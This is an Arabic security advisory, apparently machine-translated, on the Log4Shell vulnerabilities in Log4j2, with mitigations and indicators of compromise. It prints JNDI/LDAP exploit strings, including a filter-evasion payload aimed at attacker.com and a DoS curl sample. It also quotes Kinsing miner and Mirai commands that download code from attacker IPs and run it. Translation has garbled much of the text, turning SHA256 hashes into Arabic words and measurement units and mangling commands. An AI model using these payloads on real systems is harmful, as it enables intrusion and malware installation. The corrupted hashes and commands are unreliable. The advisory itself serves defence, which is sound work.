🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
ملخص تنفيذي
- هذه استشارة محدثة في سياق الاستشارة الخاصة بالثغرات الأمنية من Log4Shell أن كلاود سيك تم إرسالها في 13 ديسمبر 2021، وتغطي المخاطر الكبيرة الناشئة في مسار الأحداث هذا.
- يتم الآن استغلال الثغرة الأمنية من قبل مجموعات برامج الفدية الشهيرة مثل Khonsari و Conti.
- كان لدى Log4j2 3 تصحيحات أمنية ذات أولوية عالية في الأسبوع الماضي وحده، مما أدى إلى زيادة خطورة التهديد.
- قامت الجهات الفاعلة في مجال التهديد بتوسيع نطاق المسح بحثًا عن نقاط الضعف بشكل كبير، وقامت العديد من مجموعات التهديد البارزة ذات الدوافع المالية بالفعل باستغلال الخلل، لتنفيذ هجمات كبيرة.
- يوصى المستخدمون بالتحديث إلى الإصدار 2.17.0 أو الأحدث من Log4j2.
الجهات الفاعلة في مجال التهديد التي تبيع البرامج الضارة المناسبة للثغرات الأمنية، على قنوات Telegram
ما هو لوغ4j؟
Log4j2 هي مكتبة تسجيل تستند إلى جافا ومكتوبة بلغة جافا، وتستخدم في العديد من المكتبات مفتوحة المصدر وتستخدم على نطاق واسع في تطبيقات البرامج الرئيسية مثل Amazon و Apple iCloud و Cisco و Cloudflare و ElasticSearch و Red Hat و Steam و Tesla و Twitter و Minecraft: إصدار جافا، تينسنت QQ، HCL، VMware، Adobe، Atlassian، إلخ.
التسلسل الزمني للأحداث
في 9 ديسمبر 2021، تم الكشف عن خطأ في PoC على الإنترنت، أطلق عليه اسم Log4Shell، وهو عيب في RCE (تم تتبعه على أنه CVE-2021-44228). تم اعتبار هذا أحد أكثر نقاط الضعف تدميراً التي تم اكتشافها. وللتخفيف من هذه المشكلة، تم إصدار تصحيح في 13 ديسمبر 2021 (تم تحديثه v2.15.0).
تم الإبلاغ سابقًا عن أن هذا الإصدار معرض لهجمات DoS (رفض الخدمة)، وتبع ذلك أكد الباحثون أن هناك تجاوزات للإصلاح الذي تم تنفيذه والذي جعل هذا الإصدار عرضة لعيب RCE CVE-2021-45046 أيضًا. للتخفيف من هذا العيب، تم إصدار تصحيح آخر كان أيضًا عرضة لهجمات DoS (CVE-2021-45105). ثم تم إصدار تصحيح أمان ذو أولوية عالية في v2.17.0 للتخفيف من جميع الثغرات الأمنية.
تحليل نقاط الضعف
CVE-2021-44228
حدثت الثغرة الأمنية في Log4j بسبب التكوين الخاطئ في JNDI (تسمية Java وواجهة الدليل). لم يتم تعيين أي قيود على الأداة للوصول إلى LDAP (بروتوكول الوصول الخفيف إلى الدليل). يمكن للمهاجمين الاستفادة من هذا العيب لصالحهم من خلال تقديم طلب GET إلى أي نقطة نهاية، والتي يستجيب لها الخادم بملف فئة Java عن بُعد. يؤدي ملف فئة Java البعيد هذا عند حقنه في الخادم إلى تنفيذ التعليمات البرمجية عن بُعد.
تقوم مكتبة Java التي تقوم بالتسجيل بتفسير سلسلة كأمر، بدلاً من مجرد كتابتها إلى السجل. على سبيل المثال، يمكن للمهاجم استخدام صفحة تسجيل الدخول، ووضع سلسلة الهجوم في حقل اسم المستخدم حيث يعرف أنه سيتم تسجيلها.
أثرت هذه الثغرة الأمنية على الإصدار 2.0-beta9 إلى 2.14.1 وتم إصلاحها في الإصدار 2.15.0
CVE-2021-45046:
الثغرة الأمنية التي تم اكتشافها في الأصل في 13 ديسمبر 2021 كانت تحتوي فقط على DoS كناقل هجوم محتمل وحصلت هذه الثغرة الأمنية على درجة CVSS تبلغ 3.7. الآن، تمت زيادة النتيجة إلى 9، لأنه في بعض التكوينات غير الافتراضية، لا يزال من الممكن تحقيق تنفيذ التعليمات البرمجية عن بُعد.
كحل بديل رسمي لـ CVE-2021-44228، تم نصحه بما يلي:
- قم بتعيين خاصية النظام، أو
تنسيقات عمليات البحث الخاصة بـ MSGN: صحيح
- قم بتعيين المعلمة JVM
JAVA_OPTS = -DLOG4J2. تنسيقات MSGNLOOKUPS = صحيح
تم تعيين هذه المعلمات افتراضيًا إلى صحيح في الإصدار 2.15.0. تم اكتشاف الطرق الالتفافية للتغلب على هذه الحلول في ظروف معينة.
«فقط تخطيطات الأنماط ذات البحث عن السياق (على سبيل المثال، $$ {CTX:LoginID}) هي المعرضة لهذا. ذكرت هذه الصفحة سابقًا بشكل غير صحيح أن نمط مخطط سياق مؤشر الترابط (%X أو %mdc أو %MDC) في التخطيط سيسمح أيضًا بهذه الثغرة الأمنية.
بينما يبذل Log4j 2.15.0 قصارى جهده لتقييد عمليات بحث JNDI LDAP على localhost افتراضيًا، إلا أن هناك طرقًا لتجاوز ذلك ويجب على المستخدمين عدم الاعتماد على ذلك.»
هذا مقتطف من مدونة أمان Log4j الرسمية، والذي يشير إلى السيناريو الذي يكون فيه v2.15.0 عرضة أيضًا لتنفيذ التعليمات البرمجية عن بُعد.
في هذا الإصدار، إذا تم تمرير إدخال المهاجم إلى الوظيفة
لogger.info («السلسلة» + بيانات المهاجم)؛
لن يؤدي ذلك إلى بحث JNDI. ولكن سيظل المهاجم قادرًا على الوصول إذا كان Log4j الضعيف يستخدم سياق خريطة الموضوع:
ThreadContext.put («قيمة نمط التخطيط»، بيانات المهاجم)؛
الخصائص الافتراضية في Log4j v2.15.0 سمحت فقط بالاتصالات المحلية، وبالتالي كان التأثير ضئيلًا ولكن إذا كانت سلسلة المهاجم بالتنسيق التالي،
$ {ctx: قيمة نمط التخطيط
أدى ذلك إلى مرجع متكرر وسمح للمهاجم بالرجوع إلى خادمه الخاص، مما جعل بحث JNDI إلى الخادم الضار ممكنًا، مما أدى إلى حقن ملف فئة Java عن بُعد وتحقيق تنفيذ التعليمات البرمجية عن بُعد.
تؤثر هذه الثغرة الأمنية بشكل خاص على v2.15.0 وأي إصدار من 2.0-beta9 إلى 2.14.1 باستخدام الحل الرسمي المذكور أعلاه.
CVE-2021-45105:
هذه الثغرة عرضة لمتجه هجوم DoS الذي يمكن للمهاجم تحقيقه باستخدام عيب البحث المرجعي الذاتي. وهي تسمح للمهاجم الذي يتحكم في بيانات خريطة سياق الخيط بالتسبب في هجوم DoS، عندما يتم تفسير سلسلة تم إنشاؤها.
حمولة العينة: curl https://vulnerable.server:8080 -H 'نسخة X-Api: $ {$:: - $ {:: - $$ {: - $}}} '
تؤثر هذه الثغرة الأمنية على الإصدارات 2.0-alpha1 حتى 2.16.0 (باستثناء 2.12.3)
تدابير العلاج
لمعالجة هذه الثغرة الأمنية، يمكن للأهداف المحتملة اتباع الخطوات التالية:
- قم بالتحديث إلى أحدث إصدار على سبيل المثال. 2.17.0
- إذا لم يتمكن المستخدمون من تحديث Log4j2 إلى أحدث إصدار:
- إزالة فئة JNDilookup من مسار الفصل
الرمز البريدي -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class
يرجى ملاحظة ما يلي: يُنصح بالتحديث والتصحيح إلى أحدث إصدار، حيث قد تتسبب هذه الحلول في حدوث اضطرابات في نشاط التسجيل العادي.
3. في حالة عدم تمكن المستخدمين من التحديث إلى أحدث إصدار، قم باللجوء إلى نموذج IMMA
- أناعزل
- متصغير
- مشاشة
- أدفاع نشط
اعزل الأنظمة المتأثرة إلى شبكة VLAN ضعيفة وقم بنشر جدار حماية وكيل مع فحص عميق للحزم لتقييد الاتصال بين بقية الأنظمة. راقب الأنماط غير المنتظمة وابحث عن تغييرات التكوين غير المصرح بها وابحث أيضًا عن عدم تطابق المنفذ/البروتوكول في البنية التحتية.
يرجى ملاحظة ما يلي: إذا كنت تقوم بالتصفية على «ldap» أو «jndi» أو الكلمات الرئيسية $ {lower:x}، فهناك طرق إضافية متاحة، ويمكن أن تكون حمولة العينة:
$ {$ {Env:barfoo: -j} ndi $ {env:barFoo: -:} $ {env:barFoo: -l} dap$ {env:barFoo: -:} [//attacker.com/a]}
مؤشرات التسوية
ترتبط مؤشرات التسوية التالية بنشاط الاستغلال الملحوظ الذي يستهدف CVE-2021-44228.
رؤوس HTTP لوكيل المستخدم
$ {indi:ldap: //015ed9119662 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //32fce0c1f193 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //3be6466b6a20 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //6c8d7d40593 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //7f976567f5 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //e86eafc9294 [.] bingsearchlib [.] com:39356/a}
$ {indi:ldap: //80.71.158 [.] 12:557 /الأساسي/الأوامر/الأساسي64/KGN1
سي إم دبليو جي إل إكس إم جودا أونزيوم تو 4 لتر 2 × لون إتش إكس 3 زد 2 في 0 سي 1 سي 1 لتر
SA4MC43ms4xtgumtv BGGUC2GPFGHC2G=}
$ {indi:ldap: //45.155.205 [.] 233 [:] 12344/الأساسي/الأوامر/القاعدة 64/
1 كجم، 1 سم، WGLXMGNDUM، 1، LJNTG3NC9BDML، JDGLTI
إل كيو إكس تي بي دي إم إل جي دي جي إل تي إتش بي في سي إن آر دي إف إتش إكس 3 زد 2 في 0 آي سي 1 إكس 1 بلاسا 0 إس 4 إكس إن تي يوما 1
ليزمزو 1 أو دي سي 0 لتر 1 تي 2 إيه دبليو 0 جي إس في بي دولت 2 إيه دبليو 0 إيه دبليو 0 جي سي جي 9 واي دي إف 0 بي إف جي جي جي جي
Hc2gk}
عناوين IP
يمكن العثور على قائمة بعناوين IP الضارة المكتشفة لمحاولات Apache Log4j RCE هنا
نشاط تعدين كينسينغ
الأوامر:
curl -o /tmp/كينسينغ http://80.71.158.12/kinsing
curl -o /tmp/libsystem.so http://80.71.158.12/libsystem.so
تجعيد الشعر /إلخ/كينسينغ http://80.71.158.12/kinsing
الكروم 77/دورة في الدقيقة/الشطف
دردشة -R -i/فار/سبول/كرون
chmod +/إلخ/كينسينغ
عناوين URL
hxxp [:] //45.137.155 [.] 55/الجنس [.]
hxp [:] /45.137.155 [.] 55/الشطف
hxxp [:] //80.71.158 [.] 12/libsystem.so
hxxp [:] /80.71.158 [.] 12/كينسينغ
hxp [:] //80.71.158 [.] 12/Exploit69ogQNSQYz.class
الهاشات (SHA256)
8933820 قدم مكعب 2769 قدم 6e7f1a71e188 f551 c3d 5d3843 c52167 a34ab8d6eabb0a63ef
6e25ad03103a1a1a972b78c642bac09060 fa79c460011 dc5748 cbb433 cc459938 b
c38c21120 d8c17688 f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
نشاط عدوى ميراي
برنامج استرجاع ميراي (SHA256):
3f6120ca0ff7c6389ce392d4018a5e401a083b071187 bf54c900e2edad26 (ساعة [.]
أوامر الاسترجاع/التنفيذ الثنائية
احصل على hxp [:] /62.210.130 [.] 250/ويب/admin/x86؛ chmod +x x86؛. /x86 × 86؛
احصل على hxp [:] //62.210.130 [.] 250/ويب/admin/x86_g؛ chmod+x x86_g؛. /x86_g x86_g؛
احصل على hxp [:] //62.210.130 [.] 250/ويب/admin/x86_64؛ chmod +x x86_64؛. /x86_g x86_64؛
تجزئات ميراي الثنائية (SHA256)
776 سم 34 1504769 a67 فتحة عدسة 7 قدم في الدقيقة 5 بوصة 66 درجة مئوية 338 ديسيبل 5684 أ 8579134 عمق 3 قدم 23 165 سم 7 بوصة لكل بوصة مكعب 00
8052f5cc4dfa9a8b4f67280a746acb099319b9391e3b495a27db81
2b794cc 70cb33c9b3ae7384157 ecb78b54aedc72f4f9f94a4e6cf8984
عنوان IP لمهاجم ميراي
62.210.130 [.] 250
تجزئات حمولة البرامج الضارة الإضافية (SHA256)
0e574 fd30e806 f4298 b3cbcb8d1089454 f42f52892f87554325 cb352646049
19370 ef36f43904a57a667839727 c09c50d5e94d43b9c3183b766c4eae3d
2a4e636c4077 b493868e696 db3be864126d 1066cd 95131 f522a 4c9f5fb3fec
2b794cc 70cb33c9b3ae7384157 ecb78b54aedc72f4f9f94a4e6cf8984
39 ديسيبل 1 سي 54 سي 3 سي 6 إيه إي 73 أ 09 دي دي 0أ 9 إي 727873 ج 84217 إي 8 إف 3 إف 00 إي 357785 فبا 710 إف 98129
5c46098887e488 d91f42c6d9b93b17b2736c9f4c5a1e476c87c0d310a3f28
6370939 د 4 ص 51 ب 934 ب 7أ 2674 ee7307 ed06111 أ ب 3 ب 896 أ 8847 د 16107558 قدم 58e5 ب
63 × 43 × 5 × 29 × 806 × 7 × 7 × 7 × 7 × 7 × 4 × 4 × 4 × 43 × 4 × 43 × 30 أ 8 أ 9
6a8965a0f897539 سنتيمتر مكعب 06 قدم fefe 65d1a4c5fa450d002 d1a9d5 d69d2b48f697eee5c05
715 قدم 1 إطار 82 درجة مئوية 0 28 درجة حرارة 165 درجة فهرنهايت 750 عمق 73 505 قدم 1 عرض 6136184999411300 سم مكعب 88 سم 18 درجة مئوية 18 درجة فهرنهايت 6 درجة فهرنهايت 8 إطار 7
776 سم 34 1504769 a67 فتحة عدسة 7 قدم في الدقيقة 5 بوصة 66 درجة مئوية 338 ديسيبل 5684 أ 8579134 عمق 3 قدم 23 165 سم 7 بوصة لكل بوصة مكعب 00
8052f5cc4dfa9a8b4f67280a746acb099319b9391e3b495a27db81
a3f72a73e146834b43da88330a9cfe6cfe6d 08843a4c 23 fdf425295 e53517 الوجه
b3a6fe5c3883fd26c682b6271a700b8a6fe006ad8ad8d8d8df06ad8d6d6c09cc87530 fcd3a778
b55 ddbaeee7 abf1c73570 d6543 dd108df0580b08f730 de299579570 c23b3078 c0
c154d739 كابينة 62e958944 bb4ac5e6e965a0442a3f1c1d99d56137 e3e40
c38f0f809a1d8c50a2f13185 df1441345f83f6eb4ef9c481b9b9b90c6799
e20806791 aae93 ec120e728 f892 a8850 f624 ce2052205 ddb3f104 bbfae7f80
fe98548300025 أمبير 46 دي 1 دي 06 ب 94252 ص 601 أ 215 ب 985 د 313596 ج 3 ج 1813 إب 0
ملاحظة: راجع هذا مجموعة من التجزئات
